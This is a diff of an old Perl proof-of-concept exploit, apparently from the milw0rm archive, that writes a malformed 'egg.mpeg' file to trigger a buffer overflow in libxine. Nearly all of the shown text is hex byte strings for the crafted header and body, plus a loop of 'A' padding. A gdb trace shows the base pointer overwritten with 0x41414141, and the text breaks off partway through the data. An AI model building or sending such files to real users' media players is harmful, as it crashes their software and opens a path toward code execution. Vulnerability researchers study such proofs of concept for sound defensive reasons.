-"\x03\xAA\x14\x6F\xBF\xE1\xDD\x9F\xB8\xA0\xBF\x93\xD1\x4D\x6A\xAB\x83\xA9\xEF\xF3\xF6\x01\xCB\xBF". -"\x3F\x9C\xCF\x0F\x8B\xF1\x57\xED\x03\x9E\xBB\x59\xBE\xE5\xFC\x9C\x6F\xDD\x1D\x7F\xFC\xB3\xC3\xA3". -"\x67\xE1\x1B\x97\xE9\x72\x55\xC1\x50\x31\x18\x5C\x28\x03\x4C\x06\x12\x93\x44\xA7\x36\x25\x43\x8C". -"\x7A\xBB\x04\xFE\x16\x80\x43\xF1\x9C\x6F\x1F\xE1\x3D\x53\x1C\x03\x9F\x28\x6B\x8F\x28\x73\x5C\xD9". -"\x4D\xCB\x2C\xCC\x96\x16\xA3\xE5\x98\xC3\x31\xB3\x39\xD2\xA9\xCC\xC5\x4A\xFC\xA7\x97\xDF\x6A\x7A". -"\xE6\xDC\xB0\xBD\x4A\xBC\xC0\x31\xC6\x65\xD7\xA3\x99\x0F\x85\x28\x4B\x4B\x18\x0B\x30\x60\x26\xBE". -"\x06\x97\xBF\xFC\xA2\x9E\xDE\x1E\x42\x63\xA7\x21\xC4\xD0\xD6\x48\x9E\x69\x37\xAC\x60\x60\x98\xAE". -"\x12\x2B\xF1\x58\xB3\xCD\x2D\x2C\x8D\x0E\xBF\xE1\x99\xF8\xA2\xA0\xAB\x0A\x9E\xD6\xAB\x0C\x26\x1B". -"\x0C\x00\x80\xC0\xA7\xFF\xCC\x55\x50\xCC\xA8\x04\xA7\x54\x88\x2C\x85\xC1\x38\x3D\x29\x5E\xA4\x27". -"\xB2\x62\x86\x50\x95\x24\x08\x47\xF2\xCC\x49\x25\x39\x59\x06\x52\x10\xB7\x92\xAF\x1A\x8C\xBE\x82". -"\x33\x6B\xD5\x88\x95\x69\x3A\x72\x8F\x14\xD1\x81\xD1\xCB\xC2\x57\xA0\x5C\xB6\x25\x99\xF1\x04\x3A". -"\x0C\xD0\xE2\x00\xFC\x89\x0C\xC8\xA2\x4D\xFD\x40\xF0\xCA\xAC\x02\x4C\x3B\x1B\xCF\x4B\x10\x5D\x5E". -"\xCC\xE7\x6B\xEC\x66\x54\x5D\x1B\x22\x3F\x1A\xAC\x1D\x6B\x32\x5B\x97\xFF\x2E\x51\x6B\x13\x55\x7C". -"\xBE\xC6\x44\x46\x93\x9E\x29\xA5\xBB\x8C\x87\x76\x80\x80\xC6\xA3\x1E\x92\x22\x0D\xB0\xA7\xEC\x02". -"\xA3\x4C\x3B\xB8\x10\xF7\xB8\x93\x8D\x8C\xC0\xD1\x18\x0C\x82\x74\x86\x40\x46\x3C\xE1\x60\x5F\xC1". -"\xBA\x2A\x86\xD8\x58\x49\xFB\xAA\x24\x50\x3F\xD5\x60\xFC\xCE\x17\xFB\x7E\xDF\xA6\xF9\x9D\xDD\xBF". -"\xFF\xFB\xE9\x9D\x51\x7A\xFF\x03\x85\xDE\x97\xFA\x3B\x07\x03\x0C\x54\x56\xD8\xA3\x6E\x5F\xB6\x5E". -"\xA3\xDE\xBB\xE3\x85\x03\x4E\x68\x40\x8D\xF8\xB3\x04\xC4\xE6\xE6\xB3\x57\x1A\x46\xEF\x70\xF4\xEB". -"\x92\xA0\xE2\xAB\x62\x8E\x5F\xF9\x44\x9E\x80\xB5\xA7\x95\xFE\xFD\x5A\x9F\xB6\x55\x16\x84\x05\x24". 
-"\x88\x9C\xD0\xD9\x89\xD0\x35\xE2\x1E\x24\x46\x7D\x07\x02\xC4\x2B\x1D\x8F\x23\x36\xBE\x54\x17\x32". -"\x5F\x50\x78\xA4\xFA\x60\xFC\x08\x51\x4B\x54\x3F\x8D\x1F\xB6\x83\xE1\x80\x45\xC5\xD3\x22\x9B\xEA". -"\x73\x21\x1C\x79\x58\xA0\x0B\x3E\x09\xCE\xF3\x82\x00\x00\x08\x5D\x02\x90\x01\x00\x00\x64\x00\x82". -"\x01\x8E\x0E\x00\x00\x08\xDA\x24\x00\x00\x1C\x0C\x00\x00\x6C\xFE\x6C\xF7\x9B\xAF\x3A\x36\x20\xBA". -"\x88\xA4\xFE\xBD\x59\x00\x1F\x87\xCB\x02\x92\x5C\x43\xE4\x30\x9D\x80\xC7\xC5\x94\x54\x0C\xDC\x0B". -"\x1D\x97\x87\x8F\xFF\xCF\x2B\x64\xE1\x14\x95\x2A\x93\x08\xB3\x86\x45\xBE\x92\x29\x2F\xAF\x4C\x71". -"\x8A\xFF\x4F\xE0\x87\x48\x0E\xC7\x36\x0D\x8A\x09\x48\x47\xCE\x05\x15\x1F\xB5\x3C\x56\x55\x65\xD6". -"\xF6\x0D\x70\xC5\x5F\xCD\x51\x4F\x14\x73\xAA\x3F\x4C\xED\xB6\x43\xE0\xBB\x8F\xB4\x02\x2F\xE8\xBF". -"\x8C\x8C\x5F\x41\x89\x89\xD3\x81\x38\xBE\xDB\xF0\x34\xAD\x1C\xF8\xA1\xE8\x17\xA0\xE8\x69\x53\x61". -"\x91\x18\x6C\x54\x87\x75\x2C\xD1\xA1\x56\x80\xF3\x47\xB9\x1A\x7A\x79\x42\x09\xBD\x5A\xDA\x64\xA4". -"\x92\x74\x7D\xC8\xE4\x49\x3F\x30\x66\x67\xB6\x57\x4F\x41\xC7\x33\xA2\x03\x84\x89\x5C\x0C\x75\x55". -"\x33\x27\x41\x68\xC1\xF0\x11\x85\x54\x55\xD0\x51\xF6\x2B\xFC\xBE\x52\x06\xA0\xF5\x45\xE6\xFB\x56". -"\xFF\x7D\x01\xD2\xD2\x7B\xAB\x55\xE1\xFC\x97\xDF\x93\x36\x51\xEE\x72\xFA\x49\x66\xA7\x8C\x11\x90". -"\x1E\x71\xF5\x68\x01\x3A\x31\x33\x62\x0F\xC9\x99\x98\xA1\xDD\x55\x57\x85\x25\xE4\xB2\xAC\x7A\x4A". -"\xA8\xFE\x1A\x03\x80\x4A\x64\x09\xAC\x35\xE9\xA5\x31\x8E\x96\xDE\x1D\x73\x7F\x55\x46\x27\x38\x9F". -"\xAA\x69\x6A\xF9\x96\x9F\xB4\x03\xF1\x52\xA5\x03\xC5\x5F\xF5\xEF\x54\x89\x31\xBA\xCD\xA5\xD6\x81". -"\x31\x18\x75\x93\x1D\x55\x59\x21\x80\xD0\x61\x50\x9C\x44\x8A\xC6\xB2\x44\xF3\x81\xB4\x96\x5F\x5C". -"\x7F\xBB\x84\x92\x9F\x82\x3D\x0D\xD3\x28\x30\xA8\xAE\x30\x12\xF8\x92\x27\x98\xA9\x4E\x54\xB3\x8C". -"\xC9\xD7\xFA\x2A\x77\x8A\xD0\x56\x5D\x01\x28\x59\xA3\xA7\x51\xC5\xED\xFA\x8A\xA9\xB8\x14\x74\xEA". 
-"\x38\x82\xC8\x4B\x1C\x4C\x05\xCA\xC4\x76\x42\x16\xF0\x20\xAB\x4E\x5B\x20\xEF\xE2\xE0\xE6\x94\x1C". -"\xC2\x06\xA0\x17\xA3\x08\x06\xB0\x39\x13\x9D\x02\xFA\xA8\x91\xD2\xC8\xB5\x0B\x4F\x8E\x0C\x1D\x01". -"\x4C\xE0\x52\xD1\xDD\x85\x9B\x86\x62\x72\xB0\xA5\xEC\x60\x04\x9F\xF5\x5C\xA5\x7A\x50\xD8\xA4\x01". -"\x89\xDE\xCD\x50\x53\x68\xC8\x01\xC3\x10\xEE\x0E\xB2\xEF\x48\x1A\x9C\xFA\x80\x3C\x5F\x94\x44\x57". -"\x9B\xEF\xA4\x51\x6F\xDB\xB2\x6F\xFD\x3D\xB5\xBE\x1F\x2D\xF7\x2A\x5B\x49\xA4\xD3\xA4\x37\xB0\x93". -"\x11\xE0\x4C\x0B\x5B\xDC\x06\x13\x37\x2F\xBB\x08\x1A\x40\xAD\x88\x00\x66\x86\x0B\x37\x43\xC0\x7C". -"\xA1\xFF\x82\xB8\x81\x53\x0A\xD2\x4B\xCB\x98\x44\xBB\x3D\xEF\xC5\x03\xC5\x5E\xC6\xE4\xF6\x81\xFB". -"\x59\x66\x4F\x24\xFD\xB5\x33\xA5\x5F\xFC\xA2\x2A\xC1\xEA\xB9\x37\x67\xB9\x07\x93\xF1\x76\x7B\xC6". -"\x0F\x9F\x96\x92\x5F\x9E\xE8\x86\xF6\x83\x95\x09\xD7\xAA\x69\xC2\x3B\x25\xEA\x02\x21\xFA\x23\xAD". -"\x1F\xA7\x11\x21\x45\x82\xC2\x12\xEC\x78\x1F\x44\xF1\x2A\xC8\xBD\xB2\xC5\xA0\x1C\x03\x5E\xBF\xA4". -"\x0A\x5E\xF0\x77\x52\xF8\x1C\xA0\xE9\x00\x9C\xE9\xA7\x90\x9A\x70\x72\xE7\x9F\x51\xF4\xAF\xD7\x0E". -"\xFF\xF1\xFD\x86\x32\xC5\x7F\xBC\x59\x0A\x02\x64\x22\x5C\x4C\x60\x5B\xE7\x12\x6C\x1D\x6C\xCE\xA2". -"\x54\xBB\x71\x9F\x55\x6B\xE9\x0E\x80\x4E\x23\xD4\x4D\x62\x54\x9F\xE2\xF9\x60\xA2\x86\xC3\xE8\x5E". -"\x0E\x62\x8D\x9E\x87\x8F\xC0\x6D\x88\xA0\x63\x95\x3E\x8A\x90\x4F\x02\x81\x89\x18\x06\x40\x78\xC4". -"\x48\xD9\xD0\x0B\x73\x09\x2F\x4C\x37\x64\xCC\x38\xC9\x5D\xA4\x00\x19\xE1\x7C\x65\x30\x42\x57\x3B". -"\xD1\xDD\x6E\x6E\x87\x16\x5B\xBA\x53\xF7\x31\xA7\xD9\xE5\x99\x9B\x12\xA4\xD2\x80\xB2\x3D\x85\x57". -"\x8A\x40\x2C\x35\xAD\xA2\x78\xD0\x11\x3E\xC9\x62\x99\x0E\x59\xA7\xF2\xC0\x76\xE2\x19\x88\xCE\xE5". -"\x9E\x2F\x11\x7C\xA0\x0A\xAA\xF6\xA3\xBB\x2B\x8A\xD6\x3A\x6B\xDF\x12\x17\x04\xC1\x31\x54\x2C\x2E". -"\x6E\x03\x9A\x59\x51\xD1\xE4\xB8\x65\x7B\xFF\xEC\x94\x47\x64\x6A\x51\xA3\x92\x80\x25\xDA\xB4\xB6". 
-"\xE9\x2B\x57\x4B\xD4\x28\x0C\xD6\x21\x51\xB4\x3E\x99\x01\xE2\xA3\x7C\x5A\x14\xE4\x18\x51\xB2\x04". -"\x75\x5F\x89\x1F\xA0\xED\xFA\x50\x2D\xBD\x61\x84\xB8\x49\x4F\x51\x2A\xAA\xFD\xF3\x20\x53\xCA\x78". -"\xB8\x7A\xE2\x71\x67\x6A\x40\xF8\x89\x88\xC7\x25\x4D\xE3\xC0\x03\x37\xAC\x89\x4E\xAA\xFC\x52\x7E". -"\x78\x6D\x5C\xAC\x7B\xA3\xB7\xA6\x4F\x62\x5B\x4E\x63\x07\x5D\x0E\x39\xA4\x18\x9C\x91\x14\xC8\x1E". -"\x4B\x24\xDA\xD1\xA6\x3A\xDA\x5E\x62\xC3\xC1\xAA\x11\xA7\x20\xF6\x8E\xE0\x3B\x77\xC2\x46\xA8\xCE". -"\xE8\xF9\x4C\xBF\xE8\x3B\x2A\x28\x18\x86\x98\x5A\x82\xAA\x80\x8C\x06\x88\x2B\x67\x10\x97\x7F\x54". -"\x91\xB5\x49\xB7\x37\x30\x50\x9D\x80\x4A\x29\xCE\x4E\xCB\x56\x50\x80\x95\x1F\x38\x0D\x1D\x1D\x10". -"\x17\x8B\xE2\x8A\xB4\xCD\x3B\xF1\xB2\x43\x18\x6A\x39\xF4\x0F\x4D\xD9\x3D\x16\x92\x77\xAA\x07\x43". -"\x37\xDC\x23\x61\x9B\x56\x4F\xAA\x80\xAA\x80\xFF\x73\xB1\x8A\x64\xF6\xD1\x0C\x52\x00\x46\x15\xDE". -"\xC8\x32\x20\xE2\xD1\xD0\x1A\x8A\xC4\x6B\xCC\x67\x31\x87\x9B\x46\x52\x2C\xDF\x73\x73\xB9\xA3\xAD". -"\x55\xA9\x35\x48\xF2\x54\xBF\x4A\x78\xA4\xF4\x76\x56\x46\xC3\x22\x1E\x75\x4E\x08\xF0\xDD\xFB\xC5". -"\xB1\xFF\x00\x20\x42\x35\xF5\xC2\x25\x22\x99\xC0\x9B\x95\x07\x66\xBD\xB2\x48\x85\x42\xCF\x02\x40". -"\x14\xA9\x03\x92\xEF\x75\xA6\x9A\xCE\xB1\x46\xF5\xAE\xBF\x38\xDD\x11\xA0\xF2\x35\xC9\x58\x4F\xAD". -"\x95\x12\x11\xA0\x8D\xBA\x6D\x60\x1F\x50\x9A\x68\x1D\x05\x6D\x5C\xA6\x93\x18\x55\x4B\xE1\x1E\x55". -"\xDD\xD3\xCD\x5A\xB6\x0B\xCA\x45\x1F\xA5\x6F\x08\x85\x97\x1B\x12\x14\x6D\x2F\x29\xFA\x9A\x22\x40". -"\x62\xE4\x83\xDD\xCB\xEA\x29\xD0\x43\xB9\xCC\x1A\xD1\xBE\x56\x23\xA8\xCC\x49\x3D\x88\x85\xA4\x20". -"\xD8\x0F\xC0\x9D\x8A\x2C\xF7\x64\xC3\x16\x05\x39\xDB\x15\x64\x97\xF4\x0D\xFC\xB4\x4D\x6C\xA2\x0B". -"\xCB\x56\x14\x34\x12\x86\x4D\xA6\xEE\xDB\x15\xAA\xA9\x00\x24\xE5\x9C\x32\x17\x58\x75\x43\xC4\x50". -"\x8A\x41\xCE\xF3\x82\x00\x00\x08\x5D\x02\xF4\x01\x00\x00\x64\x00\x82\x01\x7A\x13\x00\x00\x08\xDA". 
-"\x24\x00\x00\x1C\x0C\x00\x00\x59\x97\x68\x41\x07\x19\x01\x8E\x15\x2B\xA8\x6C\xCE\x1E\x8A\xDB\xA6". -"\x2D\x1E\x4E\x2D\xC0\x50\xCB\xD2\x79\x86\x72\xAE\x1F\x92\x2D\x84\x50\xED\xF3\xD5\xBA\x46\x7E\x05". -"\xD4\x9C\x36\x28\xE9\x4A\x06\x1D\xF4\x7D\xD1\xEB\xAF\x47\x96\x02\x4B\x6C\xAD\x89\x0B\x03\x80\x31". -"\x62\x27\x37\x15\x87\x2F\xA1\xFD\x14\x2D\x15\xB9\x08\xB7\xA3\x56\x47\x6B\x84\x21\xDC\x48\xA3\xC1". -"\x38\x53\x58\xB6\xDF\xE8\xDB\x23\xC9\x8F\x22\x44\x57\x83\x38\x9E\x2E\x11\x6A\x8E\x33\x3B\xED\x59". -"\xAA\xF2\x81\x52\xF4\x8C\xE1\x04\x12\xE7\x60\x05\x2F\xEA\xB3\xBA\xA9\xFA\x67\xCE\xEC\x20\x28\xFD". -"\x80\x52\x0F\x55\xDA\xA1\x24\x3F\x94\xB8\x4A\xA3\xFB\x73\x24\x0A\x0A\x30\x64\x6B\x67\x6F\xEA\x87". -"\x34\xE9\xD8\x8A\x18\xC5\x04\x38\xD0\x94\x9B\x70\x1F\x95\x17\x0A\x48\x3B\x03\x66\xDF\xB0\xFF\x99". -"\x18\xD9\x51\x0F\x3D\x72\x25\xB7\x62\xCB\x9A\xD8\x95\x7C\x3E\x53\xFB\xB6\x88\xC3\xA8\x39\xA5\xAB". -"\x0D\x0F\xC7\xAE\xB7\x70\x3D\xAB\xDB\x44\xDA\xB2\x9C\x21\x7A\x72\x48\x8A\x68\xC0\xFB\x89\x5A\xB4". -"\xD3\x1E\xAE\x8F\xD6\x86\x0E\xBD\xD8\xC6\x02\x09\xC0\x24\x5B\x42\xB1\xAF\x50\x8E\x17\x56\x8A\x75". -"\xEB\xD3\x30\xD0\xBF\x32\x64\x4A\x05\xFF\x95\x76\xD4\x7B\xDB\x12\xEE\x43\x4F\xD0\x4B\xC5\x05\xE2". -"\x5A\x9F\x6D\xBC\xF1\x70\x1E\xDD\xAC\xE7\xEC\x6E\x64\x51\x26\x36\x74\x25\x0E\x36\xEF\x21\x13\x47". -"\x8A\xF6\x21\x42\xF3\x20\x9C\xEE\x18\xFC\x72\x16\x29\xEE\x3C\x0B\x25\xAC\xAA\xA0\x29\x69\xA8\x6C". -"\x2B\x5A\x84\x35\xA6\x57\x64\x1D\xF8\x14\xCB\xD9\x24\x28\x60\x5C\x4F\xB5\xFF\xEA\x48\x61\xBB\x44". -"\x35\x2D\x6E\x69\xC9\xA2\x41\x05\x65\x41\xC4\xC8\x36\xC9\x13\xCD\x16\x90\xFE\x11\xB6\x35\x9E\xA9". -"\x47\x37\xC8\x63\x30\x29\x16\xC0\x4C\x08\x2B\x13\x08\x91\xD0\xDB\x24\x4F\x30\x4C\xCB\x7D\x75\xC5". -"\x55\x01\xD4\xA3\xC1\xD9\x87\x21\x39\x1A\x00\xC1\x48\x64\x8E\xDC\xAC\x2C\x00\x2E\xF6\xFC\x40\xD8". -"\xDB\x2B\xB7\x56\x33\x10\xA1\x02\x23\x3E\xC2\x0B\x63\x00\x2E\xAE\x8C\xC4\x08\xAB\x6D\xA6\x45\x71". 
-"\x04\xEA\x6C\x7C\x5F\xA8\x6F\x44\x7F\x7B\x6B\x1E\x1E\xFD\x44\xDB\x72\x33\xD8\xDF\x27\xF3\x7C\x7C". -"\xA0\x17\x61\x58\x97\xB2\x0A\x12\x00\x0A\x45\xD4\xA9\xCC\xC9\xE7\x0C\x4A\x52\x5C\x40\x64\x63\x9F". -"\x1D\x49\x38\x56\x26\xF1\x9A\xCA\x08\x6D\xC7\x9E\x83\xE1\x82\xD6\x3E\xD4\x79\x8C\xF4\xFD\x1D\x5A". -"\xD6\xEE\x48\x95\xAF\x72\xA4\x95\xA7\xD3\x55\x7A\x0F\xF7\x96\x58\xBC\x9E\x50\x83\x3C\x9D\x96\x4F". -"\x94\x65\x13\x9C\x20\x80\x54\x26\xB3\xB5\x59\x22\x74\x4D\x6A\x74\x43\xE1\x9E\x23\x3E\x55\xB9\xE5". -"\x1F\x9A\x19\x60\x2E\x12\xD5\x97\x51\xD0\xC8\xA0\x70\x00\x58\x2F\x01\xC8\xA5\x29\x5B\x86\xCA\x27". -"\x20\xD9\xA4\x1C\x05\x28\x53\xE0\xE3\x9B\x53\xE1\x16\xC4\x46\xDC\xAA\xAF\x55\xAC\x22\x40\x32\xB9". -"\xC4\x93\x5A\x2B\xAF\x0B\x79\x02\xF9\x01\xD2\xBB\x9E\xFA\x0C\xDB\x83\x0C\xEA\x9E\x64\xD4\xE7\xB4". -"\x99\xDD\x71\x28\xA3\x3C\x43\xEF\x4B\xAF\x23\x79\xD5\xF9\xC7\x87\x42\x71\xF8\xCD\xF3\x08\xEA\x26". -"\xD7\x30\xD2\xF9\x4D\x2A\xF2\x85\xE6\xA1\x4E\xFD\x92\x05\xAD\x0D\x63\xA8\x47\xBC\x0A\x02\x59\xC0". -"\xCC\x8D\x07\x07\x4D\x1E\x00\x91\x99\x69\x3C\xD2\x65\x58\x33\x4B\xEC\x3D\x94\xBF\x66\x60\x64\x46". -"\x1D\xC8\x23\x14\xAB\xEA\x58\xAC\xAC\x23\x73\x19\xEF\x5A\xFA\x93\x38\xA3\x80\xD5\x89\x44\x5C\x29". -"\xCA\x94\x01\xC0\x15\x89\x9C\xEA\x34\x8E\xA5\x10\x1C\x0F\xA6\x7F\xCD\x0D\xCF\xD5\xF5\x5F\x54\xB7". -"\x58\x64\xF9\x42\x70\x9D\x9C\x9E\x28\xD8\x2A\xAA\xB6\x87\xBF\x55\x32\x09\xE4\x0C\xB2\x0A\x01\x11". -"\xAD\xE1\x5E\xE4\x97\x63\xEC\x21\xF7\x8D\x81\x50\x92\x3F\x1F\xD8\x08\x5E\xC2\xE5\x4D\x17\xFF\xF8". -"\xA5\x4C\x05\x27\xB7\x9C\x18\x67\x6A\xA2\xE1\xF1\x70\x1B\xBE\xBD\xAD\x97\xF3\x30\x0C\x78\xAE\xB4". -"\xB1\xF2\x8F\xFC\x6A\x11\x63\xCD\x22\x1C\x04\xF6\x11\xFC\xFF\x22\x4B\x28\x3E\x93\xDE\x6E\x38\x77". -"\x13\x8D\x40\x5E\x3B\x22\x07\xDC\x60\x8F\x62\x7B\x9A\x62\x02\x26\xF7\xEC\x8C\x5D\x46\x7B\x2E\x31". -"\x2D\xFD\x02\xB5\x58\xF6\xA1\xF8\xAB\x38\x12\xFE\xA7\xEA\x58\xCF\x66\x2D\xBB\x6C\x02\x34\xF9\x40". 
-"\x8B\xDB\xA0\xA0\x59\x19\x18\x68\x00\x0B\xF3\x03\x03\x63\x58\x3D\xE0\x65\x50\x19\x86\xEC\xCD\xB3". -"\x22\xC2\xF4\x97\xE2\xA6\x75\xDA\xDD\xC8\x1A\x43\x02\xA8\xC0\xE5\x34\xE8\xA4\x63\x73\x10\x2A\xC7". -"\x1C\x24\xE9\xB4\xE3\x5E\xA6\xF3\x18\xC4\x2D\x6D\xE4\x5A\x67\x87\x5C\x6C\x91\xC5\x3B\x54\xDF\x59". -"\x9D\x11\xA8\xF6\x64\x63\xF7\xF7\xDD\xF2\x80\x52\x56\x73\x1E\xE0\x69\xFA\x71\xB3\xA4\x0A\x3E\x7A". -"\xEE\xE9\x4E\xD7\x00\x48\x7E\x72\xE2\x65\x6F\xC8\xCB\x2D\x48\xF1\x9B\x72\x34\x35\x8F\x2E\xD0\x71". -"\x20\x99\x6A\x29\x51\x50\x44\xBC\xB3\xFA\x44\xA4\x06\xF8\x12\xE7\x5D\xAF\xFD\x48\xE2\x13\x7D\x55". -"\x60\x68\x1B\x71\x06\x20\xE3\x42\x33\x58\x68\x9F\x86\x05\x45\x62\x5C\x74\x69\xA3\x1D\x05\xC1\x14". -"\x0C\xD0\xA6\x4A\x93\xE9\x14\xEA\x78\xC1\xDD\xC5\xC0\x52\xCC\xAB\xAC\x9C\x83\xA2\x78\x84\x72\x98". -"\x64\x45\x18\xC0\xC3\xF9\xC8\x50\x8A\xF1\x51\xD0\x6E\x49\x72\x9F\xBC\xE1\xD2\xF3\x49\xB1\xD0\xE8". -"\x5C\x13\x11\x41\x6F\x54\x0B\x66\x52\xF0\x76\x4E\x1B\x23\xB3\x2C\x01\x22\xCE\x08\xD3\xA0\x79\xE0". -"\xC8\x1A\xB9\x47\x5B\x47\x40\x24\xCB\x37\x95\x62\x8C\x8E\x2E\x76\x7B\xB7\xF8\xDC\x02\xEC\x01\x8B". -"\x2D\x50\x05\xFC\x23\x9B\x1A\xC5\x2A\x7C\xA3\x24\xEC\xDB\x6A\xF8\x5D\xEA\x5F\xCB\x9B\xFF\x48\xC0". -"\x8E\x0E\x70\xA4\xE2\x60\x4B\x24\xA1\x9A\xE5\xB9\x8B\x07\x73\xF1\xD1\x48\x08\x48\xDA\x5B\x48\x9B". -"\xD9\x3F\x8C\x71\xE0\x11\xA6\x72\xDE\x27\x42\x45\x99\x68\x48\xB1\x64\x87\x80\xDC\xA5\x68\x8A\x5A". -"\x9F\x4E\x73\x6E\xD0\xF5\x1E\xE7\xFC\xD5\x61\x95\x1F\xF2\x88\x56\xA3\x45\x56\xCE\xF3\x82\x00\x00". -"\x01\x5D\x58\x02\x00\x00\x64\x00\x82\x01\x03\x00\x00\x00\x00\x08\x80\x02\x00\x00\x5C\x0E\x00\x00". -"\x80\x02\x2A\x00\x00\x76\x7E\x5A\x0C\xA0\x88\xE8\x44\x3D\xAA\x40\x58\xA4\x26\x9A\x5F\x04\x21\x26". -"\x19\x06\x04\x81\x76\x84\xEB\x72\x64\x3F\x20\x25\x33\x50\xF7\x17\x6F\xD6\x6C\x35\x9E\xDC\x95\x32". -"\x60\x1D\xB5\xB3\x1B\x07\x50\xCD\xCE\xBC\x7B\xE5\xBD\xED\xE3\xAB\xF1\xA0\x10\x10\x55\x74\x32\x1F". 
-"\x2E\x20\x25\x29\x9C\xA0\x0A\x88\x80\x93\x49\x75\xA9\xBD\x98\x02\x6A\x90\x10\x6A\xA0\x24\x9A\xCC".
-"\xE5\xC0\x32\xB9\x8C\x99\x8D\xE9\x8C\xD0\x63\x3A\x18\xC5\xE0\x25\xA4\xC2\x64\xB0\x80\x60\x55\x83".
-"\x2B\x9D\x0E\x49\xBA\x1E\x3A\xFF\x11\x81\x01\x05\x67\x43\x21\xED\x46\xD4\x29\x28\x7D\x48\x45\x00".
-"\xC1\x93\x2D\x8B\x8A\x24\xC4\x98\x50\x00\x19\x08\x84\xD2\x10\x19\x21\x7C\xF6\x0A\x50\x1B\x0A\xEB".
-"\xB6\xC9\x8D\xB2\xE0\x40\x2D\x88\x98\x06\x0C\x16\x90\x77\xAB\xDD\x08\x10\xA9\x2F\x1D\x7F\x79\xC1".
-"\x40\x82\xB3\xA1\x90\xF6\xAE\xC0\xA7\xC0\x96\x00\x9D\x02\x43\x42\x9B\x22\x03\x4A\x49\x20\x01\x54".
-"\xC4\x03\x00\xC8\x30\x43\x24\x67\x20\x41\x92\xD6\xEB\x51\x99\xB5\x24\x12\x21\xA4\x96\x13\xB9\x98".
-"\x99\x6B\x8D\xC0\xC5\x3E\xBC\x74\x7E\x2C\x00\x01\x15\x67\x43\x21\xEE\xE0\x94\xBF\x6A\x50\x8C\x8E".
-"\x10\xD0\x8D\x46\x8C\x84\x41\x41\x32\xE1\x78\xEB\xFD\x41\x06\x00\x05\x78\x43\x21\xF3\x7B\x02\x4B";
-
-
-for ($i = 0; $i < $len; $i++) {
-$buffer .= "\x41";
-}
-
-open(EGG, ">$EGGFILE") or die "ERROR:$EGGFILE\n";
-print EGG $header;
-print EGG $buffer;
-print EGG $end;
-
-close(EGG);
-
-# milw0rm.com [2006-04-04]
+#!/usr/bin/perl
+#####################################################################
+# Libxine <= 1.14 : MPEG Stream Buffer overflow vulnerability / PoC
+#
+# Federico L. Bossi Bonin
+# fbossi[at]netcomm.com.ar
+####################################################################
+
+
+# (gdb) run /tmp/egg.mpeg
+# Starting program: /usr/bin/gxine /tmp/egg.mpeg
+# Program received signal SIGSEGV, Segmentation fault.
+# [Switching to Thread -1276580944 (LWP 30688)]
+# 0xb7edee9a in xine_list_delete_current () from /usr/lib/libxine.so.1
+# (gdb) x/x $ebp
+# 0x8e2cbd4: 0x41414141
+# (gdb)
+
+my $EGGFILE="egg.mpeg";
+my $len=2024;
+
+my $header=
+"\x30\x26\xB2\x75\x8E\x66\xCF\x11\xA6\xD9\x00\xAA\x00\x62\xCE\x6C\x2E\xA9\xCF\x11\x8E\xE3\x00\xC0".
+"\x0C\x20\x53\x65\x2E\x00\x00\x00\x00\x00\x00\x00\x11\xD2\xD3\xAB\xBA\xA9\xCF\x11\x8E\xE6\x00\xC0".
+"\x0C\x20\x53\x65\x06\x00\x00\x00\x00\x00\x91\x07\xDC\xB7\xB7\xA9\xCF\x11\x8E\xE6\x00\xC0\x0C\x20".
+"\x53\x65\x72\x00\x00\x00\x00\x00\x00\x00\x40\x9E\x69\xF8\x4D\x5B\xCF\x11\xA8\xFD\x00\x80\x5F\x5C".
+"\x44\x2B\x50\xCD\xC3\xBF\x8F\x61\xCF\x11\x8B\xB2\x00\xAA\x00\xB4\xE2\x20\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x1C\x00\x00\x00\x08\x00\x00\x00\x01\x00\x40\x34\x7C\x00\x61\x01\x01\x00\x80\x3E\x00\x00".
+"\xD0\x07\x00\x00\x80\x02\x10\x00\x0A\x00\x00\x22\x00\x00\x0E\x00\x80\x07\x00\x00\x01\x80\x02\x80".
+"\x02\x01\x00\x00\x91\x07\xDC\xB7\xB7\xA9\xCF\x11\x8E\xE6\x00\xC0\x0C\x20\x53\x65\x81\x00\x00\x00".
+"\x00\x00\x00\x00\xC0\xEF\x19\xBC\x4D\x5B\xCF\x11\xA8\xFD\x00\x80\x5F\x5C\x44\x2B\x00\x57\xFB\x20".
+"\x55\x5B\xCF\x11\xA8\xFD\x00\x80\x5F\x5C\x44\x2B\x00\x00\x00\x00\x00\x00\x00\x00\x33\x00\x00\x00".
+"\x00\x00\x00\x00\x02\x00\x40\x34\x7C\x00\x40\x01\x00\x00\xF0\x00\x00\x00\x02\x28\x00\x28\x00\x00".
+"\x00\x40\x01\x00\x00\xF0\x00\x00\x00\x01\x00\x18\x00\x57\x4D\x56\x31\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x01\xCD";
+
+
+my $end=
+"\x24\x84\x21\x00\x06\x06\x94\xA4\xB4\x92\xF5\xA7\x55\x54\x7E\xB6\xB3\x3A\xE9\x65\xA7\xEE\xDE\x9B".
+"\x7B\xE4\x25\x34\xA1\x08\x13\x29\x21\xB4\x54\x4D\x0F\xA0\xA1\x3C\x74\x83\x0D\x1A\x32\x36\xAB\xC6".
+"\x91\xD5\xD0\x88\xC6\x62\x1E\x71\x65\x2F\xDC\x44\xAE\x0B\x78\x74\x14\xD3\x84\x9F\xCE\x80\x80\xA2".
+"\x52\x94\x41\xA8\x84\x3B\x09\x09\x44\xA2\x1B\xD4\xA7\x1B\xC7\x52\xDF\x00\x83\x23\x19\x88\xF6\xA5".
+"\x09\x9A\x9C\x78\x6F\xA9\x7E\x9A\x52\x2A\x8D\x12\xD0\x46\x88\x68\x54\x24\xB2\x53\x51\x14\x09\x10".
+"\x11\xB2\x60\xED\x83\x30\xAA\x27\xA6\xC4\x32\x37\x20\x06\xB4\x4A\xB2\xD5\x40\x2C\x88\xC4\x0E\x63".
+"\x15\x59\x19\x6C\x30\xBC\x75\xFE\x1E\x50\x10\x43\x63\x21\x1E\xFD\x44\x31\xF0\xA1\x69\xF3\xB2\xFE".
+"\x60\x01\x24\x58\x54\x1A\x81\x44\xD5\x4C\x22\x94\xC4\x00\x6A\x69\x70\xE5\xA9\x63\x4C\x5D\xA6\xCB".
+"\x2A\xB0\x1E\xEC\x36\xE2\x03\x4E\x98\xC0\x08\xBB\x76\xB5\xD0\x5E\x1E\x3A\xBE\xFA\x02\x81\x05\x35".
